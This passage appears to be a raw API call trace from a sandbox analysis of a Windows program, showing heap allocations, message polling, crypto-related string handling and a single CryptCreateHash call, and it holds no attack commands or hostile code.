PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.335] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0220.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0220.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0220.336] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0220.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.336] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0220.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0220.337] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0220.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0220.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0220.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.338] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0220.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0220.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.338] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.339] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.339] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0220.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0220.339] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.339] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.339] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.339] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0220.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.341] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0220.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0220.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0220.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0220.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51460, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.342] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0220.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0220.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0220.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0220.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0220.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0220.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0220.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0220.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0220.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 